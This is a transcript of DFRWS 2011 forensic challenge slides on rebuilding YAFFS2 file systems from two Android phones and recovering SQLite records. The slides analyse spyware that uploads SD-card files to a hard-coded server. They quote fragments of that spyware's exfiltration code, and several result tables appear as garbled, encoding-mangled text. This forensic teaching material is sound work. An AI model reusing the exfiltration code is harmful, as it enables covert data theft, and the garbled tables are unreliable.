titel turning android inside out spreker dfrws 2011 challenge...turning android inside out dfrws...
TRANSCRIPT
Case description
• Android phone 1: – Donald Norby – Dead – What happened?
• Android phone 2: – Yob Taog – Data breach at SwiftLogic: IP leaked – Guilty?
Data acquisition
• SD card: regular imaging tools • NAND contains multiple partitions:
– MTD mounted on /data – MTD mounted on /cache
• Case 1: Root + DD used – No OOB content! !
• Case 2: Root + Nanddump used – Cross-compile for ARM
Norby’s data
• 9 PDF files in sdcard/download folder • The PDF files contain schematics of
SwiftLogic • From cache: carved HTML pages of Taog’s
social media pages and google searches
• The cases are linked!
A relevant HTML file
On norby’s phone in cache partition
Nice, an IP-address Protected by htaccess !
Dir listing page of Apache
Hm!origin of the 9 PDF files?
FILE SYSTEM RECONSTRUCTION
Taog’s phone
!"#$%&'"()*&&+"&,-)".$"/)(0$(1"*"-)+#$('"2)*(34"5$#6"7%.".4)".$$&2"'$58."%5')(2.*5'"9:;;<=",1*>)2"
Rebuilding file system
• Use mobile forensic toolkit (UFED,XRY) • Use unyaffs2 (
http://code.google.com/p/yaffs2utils) – Doesn’t work properly on ‘real’ images
• Use Android emulator – Extract files using adb
• Rebuild Linux kernel with YAFFS2 support
YAFFS2 in linux
1. Clean Ubuntu installation 2. Get YAFFS2 source repository (
http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary)
3. Patch it into the kernel 4. Use NANDsim to simulate NAND device 5. Use NANDwrite to write image to device
– Don’t forget –r switch for OOB bytes – Nandwrite –a –r /dev/mtdX ~/DFRWS/mtdX.dd
And presto Mount /dev/mtdblock0 /mnt/case2/data fox@server1104:/mnt/case2/data$ ls -l
total 27 drwxrwx--x 1 fox fox 2048 2011-05-05 04:06 anr drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 app drwxrwx--x 1 fox fox 2048 1970-01-01 01:02 app-private drwx------ 1 fox fox 2048 1970-01-01 01:02 backup -rw-rw-rw- 1 root root 8 2011-05-11 02:45 cc_data
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 dalvik-cache drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 data drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found drwxrwx--t 1 fox 9998 2048 2011-05-11 02:45 misc
drwx------ 1 root root 2048 2011-05-10 22:43 property drwxrwxr-x 1 fox fox 2048 2011-05-11 02:42 system drwxr-xr-x 1 fox fox 2048 2011-05-07 18:50 tombstones
UID=1000, GID=1000
A suspicious application
• Perform keyword search – Phone numbers, names, other relevant terms
• Hit on IP-address 50.56.29.109
• /data/dalvik-cache/data@[email protected]@classes.dex
Hmm!
Com.andriod.mm
• Not in the Android market • data/system/packages.xml
– Installed on the evening that phone is bought • Retrieve the APK for reverse engineering:
Data/apps/com.andriod.mm – unzip it!
• Convert dex (bytecode) to regular jar – dex2jar
Analysis of androidManifest.xml
<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" /> [!] <receiver [!] android:name="com.andriod.mm.bootComp"> <intent-filter> <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" /> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.SCREEN_OFF" /> </intent-filter> </receiver> [!]
D2)":@E.$$&2"F3$')G>$$>&)G3$1H/H*5'($,'A*/-.$$&HI""
Permissions
Triggers
Analysis of java code
[…] private static final String DEFAULTHOST = "50.56.29.109"; private static final int DEFAULTPORT = 10001; […] int sendFile(String s){ […] socket = SocketFactory.getDefault().createSocket("50.56.29.109", 10001);
outputstream = socket.getOutputStream(); outputstream1.write(abyte2, k1, l1); […]
D2)"J'>%,"0$("')3$1/,&*B$5"FK*L*G')3$1/,&)(G0())G0(HCMNK'>%,I""
Apparently files are sent to this server
Analysis of java code (2) • Secretly steals sd data:
– On trigger, sd-card is scanned for files – Files zipped and sent to 50.56.29.109: 10001
– SMS “pkg uploaded” • Monitor calls
– SMS “Callin” + number + date/time • Monitors received text messages and
forwards – SMS “FORWARDED SMS from” + originating address
+ “ at” + date/time + “: ksms” + message
Q)*')("R*.*"S"
R*.*"S" Q)*')("R*.*"
="
About YAFFS2 Out of band bytes
R*.*"S" Q)*')("
High fragmentation
Challenge
• The user data and cache partition are YAFFS2 formatted.
• Remember, we don’t have the OOB bytes – File reconstruction is very difficult at least
• Regular carving tools perform poorly
• But we really want those sqlite records
SQLite format T$$."/*>)"
!5.)(,$("/*>)" !5.)(,$("/*>)" !5.)(,$("/*>)"
U)*0"/*>)"U)*0"/*>)"U)*0"/*>)"
U)*0"/*>)"U)*0"/*>)"
U)*0"/*>)"
@*>)"4)*')(" V)&&"/$,5.)("*((*+"
V)&&"3$5.)5."*()*"
D5*&&$3*.)'"*()*" offset Data records here!
Schema and SQLite signature stored here!
Pages not fragmented
The idea
1. Identify SQLite pages from raw YAFFS2 image by page signature
2. Parse out the records using the cell pointer array.
3. Match the anonymous records against predefined templates. – Analyze important SQLite databases for table
format
Results (Contacts) ,'" 5%17)(" '*.)HB1)"F%.3I" '%(*B$5" .+/)" 5*1)"
S" WWXY=ZW[Z\" ]^H]WH=]SS"SS_XS_]\"@`" XWS" a%." `("b"
=" WS=WZ=X\]=" ]^H]^H=]SS"S=_]W_]S":`" YS" a%."
X" WWXY=ZW[Z\" ]^H]^H=]SS"S=_X\_S[":`" SS^" a%." `("b"
W" WS=WZ=X\]=" ]^H]^H=]SS"]X_S\_XX"@`" \W" a%."
^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_WZ_=W"@`" X\S" !5" `("b"
!'" ',2/&*+"5*1)" )P.(*",50$"
S" `("b"• 1()c4%241*,&G3$1""• WWXAY=ZAW[Z\"• ̀ ("b"
=" d*$>" • d*$>"d*$>"• WS=WXYXX\\""
X" 1(")" • WWXY=ZW[Z\""• 1("
•
Results (SMS) S^W" WS=WXYXX\\" ]^H]\H=]SS"]W_S=_SZ":`" S" ,5" -212Le#212_HH1)22*>)H/->"%/&$*')'f"S^W" WS=WXYXX\\" ]^H]\H=]SS"]W_S=_SZ":`" ]" ,5" -212Le#212_HH1)22*>)H/->"%/&$*')'f"
S^^" ]^H]\H=]SS"]W_SX_W\":`" S" '(*g" h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"
S^^" ]^H]\H=]SS"]^_XS_=\"@`" S" '(*g" h$."2$1).4,5>"0$("+$%6"2*1/&)"24$(.&+"
S^^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_]^_XW"@`" S" /)5',5>" h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"
S^^" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_]^_XW"@`" S" $%." h$."2$1)"()2%&.26"!".4,5-"#)"5))'".$"%/".4)"0))6"2*+"'$%7&)C"
S^Z" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_SZ_SW"@`" ]" ,5" 9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"')*&"5$#G"
S^Z" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_SZ_SW"@`" S" ,5" 9$%"*()"K$-,5>6"(,>4.C"9$%"3*5i."2)(,$%2&+".4,5-"*7$%."34*5>,5>".4)"')*&"5$#G"
S^[" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_==_XY"@`" S" /)5',5>" !"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"
S^[" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_==_XY"@`" S" $%." !"K%2."2)5."+$%"*"2*1/&)6"!".4,5-"+$%i&&"7)"/&)*2)'GGG"
S^\" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_X]_SX"@`" ]" ,5" 9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"
S^\" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_X]_SX"@`" S" ,5" 9$%"*()"2)(,$%2".4)5G"!"3*5"2))".4)",50$(1*B$5",2"L*&%*7&)"7%."!"*1"',2/&)*2)'"#,.4"+$%"7()*-,5>".4)"')*&G"
S^Y" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_^Z_WW"@`" S" /)5',5>" !"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$(".4)")P34*5>)"
S^Y" WWXY=ZW[Z\" ]^H]\H=]SS"]Z_^Z_WW"@`" S" $%." !"-5)#"+$%i'"&,-)".4)16",&&"7)"*.".4)"*>())'"2/$.6",5"*7$%."=^"1,5"0$(".4)")P34*5>)"
Results (Browser) ,'" 4$2." %2)(5*1)" /*22#$('"
S" ^]G^ZG=YGS]Y" 5$(7+" ***222//"
!'" R*.)HB1)" d,.&)" DTU" j,2,.2"
XW" ]^H]ZH=]SS"]Z_=[_XZ"@`" +$7k.*$>"A"d#,l)("<)*(34" 4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>" S"
XW" ]^H]ZH=]SS"]Z_=[_XZ"@`" 4l/_HH2)*(34G.#,l)(G3$1H2)*(34CMN+$7k.*$>" S"
X^" ]^H]ZH=]SS"]Z_=[_W["@`" 4l/_HH1G.#,l)(G3$1H+$7k.*$>" S"
XZ" ]^H]ZH=]SS"]Z_=[_W["@`" d#,l)(" 4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>" S"
XZ" ]^H]ZH=]SS"]Z_=[_W["@`" 4l/_HH1$7,&)G.#,l)(G3$1H+$7k.*$>" S"
X[" ]^H]ZH=]SS"]Z_=\_]Y"@`" d#,./,3"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)(" 4l/_HH.#,./,3G3$1HW.230Z" S"
X[" ]^H]ZH=]SS"]Z_=\_]Y"@`" 4l/_HH.#,./,3G3$1HW.230Z" S"
X\" ]^H]ZH=]SS"]Z_=\_=Z"@`" d#,./,3"A"<4*()"/4$.$2"*5'"L,')$2"$5"d#,l)(" 4l/_HH.#,./,3G3$1HW.L13%" S"
X\" ]^H]ZH=]SS"]Z_=\_=Z"@`" 4l/_HH.#,./,3G3$1HW.L13%" S"
SZ" ]^H]\H=]SS"]^_^\_XW"@`" 4l/_HH###G>$$>&)G3$1H1C2$%(3)N*5'($,'A4$1)" X"
XY" ]^H]\H=]SS"]^_^Y_=\"@`" 4l/_HH^]G^ZG=YGS]YH22H" S"
XY" ]^H]\H=]SS"]^_^Y_=\"@`" !5')P"$0"H22" 4l/_HH^]G^ZG=YGS]YH22H" S"
XY" ]^H]\H=]SS"]Z_=\_]^"@`" !5')P"$0"H22" 4l/_HH^]G^ZG=YGS]YH22H" ="
Creating the time line
• Normalized all times to UTC time
• Determine the timezone of each source
• Analyst’s Notebook for timeline